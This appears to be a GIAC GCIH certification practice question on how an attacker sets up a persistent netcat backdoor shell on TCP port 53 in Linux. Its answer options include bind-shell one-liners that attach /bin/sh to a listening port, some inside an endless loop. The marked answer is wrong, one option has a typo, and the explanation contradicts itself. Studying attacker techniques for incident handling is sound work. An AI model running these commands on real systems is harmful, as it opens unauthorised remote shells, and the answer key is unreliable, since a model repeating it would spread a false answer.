GIAC Certified Incident Handler (GCIH) — Question 36

How could an attacker set up a persistent backdoor listener to a login shell on TCP port 53 using netcat on a Linux system?

Answer options

• A. nc -l -p 53 -e /bin/sh
• B. nc -1 -p 53
• C. while true; do nc -l -z -p 53; done
• D. while true; do nc -l -p 53 -e /bin/sh; done

Correct answer: B

Explanation

The correct answer, B, indicates the use of netcat to listen on port 53, but it lacks the persistent aspect. Option A would execute a shell immediately, but it does not provide a continuous listener. Option C checks for an open port without establishing a backdoor, and option D creates a listener but runs indefinitely, which is not the simplest persistent method.